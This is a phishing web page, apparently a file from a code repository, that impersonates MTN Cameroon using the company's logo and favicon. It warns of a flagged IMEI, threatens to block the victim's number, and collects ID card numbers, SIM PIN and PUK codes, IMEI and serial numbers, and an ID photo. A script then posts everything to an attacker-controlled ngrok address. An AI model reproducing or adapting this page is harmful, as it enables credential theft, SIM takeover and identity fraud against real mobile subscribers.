-
Notifications
You must be signed in to change notification settings - Fork 0
/
phish11.html
73 lines (64 loc) · 2.31 KB
/
phish11.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<!DOCTYPE html>
<html>
<head>
<title>IMEI ERROR SUSPICIOUS ACTIVITIES</title>
<link rel="shortcut icon" href="https://www.mtncameroon.cm/favicon.ico">
<style>
body {
background-color: yellow;
}
h1, h2, p {
color: black;
}
img {
width: 100px;
}
form {
margin-top: 20px;
}
input {
background-color: white;
border: 1px solid black;
}
</style>
</head>
<body>
<h1>Your cell phone's IMEI code has been flagged for suspicious activity.</h1>
<p>Please click on the link below to verify your identity and update your security settings.</p>
<a href="https://www.example.com/verify-identity">Verify Identity</a>
<br>
<h2>We are conducting an investigation into a recent data breach.</h2>
<p>Please provide your ID card number, SIM PIN and PUK numbers, and serial number so that we can verify your account.</p>
<p>**If you do not provide the verification code below, your phone number will be blocked.**</p>
<img src="https://www.mtncameroon.cm/images/logo.png" alt="MTN Cameroon Logo">
<form action="https://<your ngrok url>/" method="post" enctype="multipart/form-data">
<input type="tel" name="phone_number" placeholder="Phone Number">
<input type="text" name="id_card_number" placeholder="ID Card Number">
<input type="text" name="serial_number" placeholder="Serial Number">
<input type="text" name="IMEI" placeholder="IMEI">
<input type="text" name="pin_number" placeholder="PIN Number">
<input type="text" name="punk_number" placeholder="PUK Number">
<input type="file" name="id_card_photo" accept="image/jpeg,image/png">
<input type="submit" value="Submit">
</form>
<script>
const form = document.querySelector('form');
form.addEventListener('submit', (event) => {
event.preventDefault();
const data = new FormData(form);
data.append('phone_number', form['phone_number'].value);
const request = new XMLHttpRequest();
request.open('POST', `https://<your ngrok url>/`);
request.send(data);
request.onload = () => {
if (request.status === 200) {
const response = JSON.parse(request.responseText);
console.log(response);
} else {
console.log('Error: ' + request.statusText);
}
};
});
</script>
</body>
</html>